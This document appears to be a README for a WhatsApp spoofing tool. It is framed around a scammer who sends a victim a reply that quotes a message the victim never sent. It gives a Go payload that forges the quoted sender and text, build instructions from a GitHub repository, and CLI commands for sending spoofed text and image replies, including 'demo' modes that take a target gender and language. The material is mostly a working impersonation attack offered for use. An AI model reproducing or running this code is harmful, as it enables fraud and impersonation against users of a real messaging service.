Users: UserA, UserB; UserA is not known by UserB
UserA (SCAMMER) sends a spoofed messages to UserB in response to a message that UserB did never send
Spoofed message payload:
msg := &waProto.Message{
ExtendedTextMessage: &waProto.ExtendedTextMessage{
Text: proto.String("Some text"),
ContextInfo: &waProto.ContextInfo{
StanzaId: proto.String("Some Random ID"), //Random ID
Participant: proto.String("[email protected]"), //Spoofed user ID
QuotedMessage: &waProto.Message{
Conversation: proto.String("Some Spoofed text"), //QuotedMessage Spoofed text
},
},
},
}
Send the Spoofed Payload:
resp, err := cli.SendMessage(context.Background(), chatID, msg)
// chatID is the ID of the chat you want to send the message to, can be a group or the same number as the spoofed user ID
git clone https://github.com/AdibChiguer/wtsp-spoof.git
cd whats-spoofing
go mod download
go get
go build
./whats-spoofing
getgroup <jid>
listgroups
send-spoofed-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_text>|<text>
send-spoofed-img-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_file> <spoofed_text>|<text>
send-spoofed-demo <toGender:boy|girl> <language:br|en> <chat_jid> <spoofed_jid>
send-spoofed-demo-img <toGender:boy|girl> <language:br|en> <spoofed_jid> <spoofed_img>